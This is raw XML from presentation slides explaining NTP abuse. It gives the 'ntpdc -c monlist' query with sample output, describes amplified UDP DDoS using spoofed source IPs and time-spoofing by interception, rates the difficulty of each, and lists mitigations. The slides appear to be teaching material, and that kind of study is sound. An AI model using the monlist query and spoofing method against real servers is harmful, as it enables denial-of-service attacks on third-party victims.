              <a:t>s IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31778" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2517774" y="7581901"/>
            <a:ext cx="1143000" cy="889000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="008000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130045" tIns="65022" rIns="130045" bIns="65022"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Arc 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="436245">
            <a:off x="2821741" y="1161855"/>
            <a:ext cx="2745442" cy="2402864"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11817582"/>
              <a:gd name="adj2" fmla="val 15557303"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="stealth" w="lg" len="lg"/>
            <a:tailEnd type="none" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="65023" rIns="130046" bIns="65023" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2350378" y="1738062"/>
            <a:ext cx="1283998" cy="744135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034790" y="2961476"/>
            <a:ext cx="773318" cy="437727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3943113" y="4619467"/>
            <a:ext cx="773318" cy="437727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3930053" y="6569592"/>
            <a:ext cx="773318" cy="437727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310294" y="8665634"/>
            <a:ext cx="773318" cy="437727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477760" y="7858026"/>
            <a:ext cx="5112991" cy="1608643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker makes large number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>monlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> requests to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTP Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which can flood a victim with UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDOS &gt; 350Gbps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40626115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130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>NTP ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>Monlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>’ Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>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root@server</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ntpdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>monlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [hostname]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote address          port local address       count m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>avgint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lstint</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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localhost.localdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  53949 127.0.0.1               1 7 2      0      0       0</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tock.usshc.com           123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         1 4 4    5d0      0      53</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198.52.198.248           123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         1 4 4    5d0      0      54</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rook.slash31.com         123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         1 4 4    5d0      0      55</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eightyeight.xmission.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxx.xxx.xxx.xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         1 4 4    5d0      0      56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[continue for hundreds of records]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40582265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lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>NTP Abuse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177800" y="7848600"/>
            <a:ext cx="11704320" cy="1838961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Mitigations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Disable ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>monlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>’, or filter it out using a Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Use authentication for the request/response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Conceptually same as DNS Amplification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432707944"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="291944" y="1676400"/>
          <a:ext cx="12045071" cy="6198729"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7763071">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4282000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="527417">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Abuse</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Difficulty</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="527417">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="342883" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>1. Recon: Obtain a list</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> of the last 600 IP/hostnames</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Easy.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1690624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>2.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> Perform a DDOS attack by using ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" err="1"/>
                        <a:t>monlist</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t>’ feature. Spoof source IPs using the target as destination IP.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t>Request size: 48-234 bytes; Response size: ~48kb</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Spoofing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> IPs is easy. Need to deal with ingress filters.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1300480">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>3. Intercept</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> a request and reply with the incorrect time to mess up server time syncs. Will mess up logging.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Easy: If on the same LAN</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" dirty="0"/>
                        <a:t>Very Hard:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0"/>
                        <a:t> Not on same LAN</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="130048" marR="130048" marT="65024" marB="65024"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
